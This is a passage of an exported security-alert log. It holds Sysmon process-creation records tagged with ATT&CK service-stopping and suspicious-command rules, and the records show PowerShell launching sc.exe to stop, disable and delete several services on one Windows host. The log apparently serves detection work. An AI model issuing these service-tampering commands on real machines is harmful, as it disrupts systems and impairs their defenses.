Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.936",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.538 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001000e51d00} +ProcessId: 8136 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinHelp32 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= 
Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.542949100Z"",""eventRecordID"":""2344"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.538\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001000e51d00}\r\nProcessId: 8136\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinHelp32 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.538"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001000e51d00}"",""processId"":""8136"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinHelp32 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.886",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.504 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001038e31d00} +ProcessId: 6876 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalwpi +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.508097300Z"",""eventRecordID"":""2342"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.504\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001038e31d00}\r\nProcessId: 6876\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalwpi\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:00.504"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001038e31d00}"",""processId"":""6876"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalwpi"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.815",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.351 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010afe01d00} +ProcessId: 6032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalaie +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.354767400Z"",""eventRecordID"":""2339"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.351\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010afe01d00}\r\nProcessId: 6032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalaie\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.351"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010afe01d00}"",""processId"":""6032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalaie"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.762",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.318 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010c9de1d00} +ProcessId: 1344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.321096700Z"",""eventRecordID"":""2337"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.318\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010c9de1d00}\r\nProcessId: 1344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.318"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010c9de1d00}"",""processId"":""1344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.749",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.301 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010eddd1d00} +ProcessId: 5164 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationalmll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.303627100Z"",""eventRecordID"":""2336"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.301\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010eddd1d00}\r\nProcessId: 5164\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationalmll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.301"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-0010eddd1d00}"",""processId"":""5164"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationalmll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:28.683",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:50:00.251 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001066db1d00} +ProcessId: 5956 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Nationaloll +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.254211600Z"",""eventRecordID"":""2333"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.251\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001066db1d00}\r\nProcessId: 5956\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Nationaloll\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.251"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001066db1d00}"",""processId"":""5956"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Nationaloll"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 
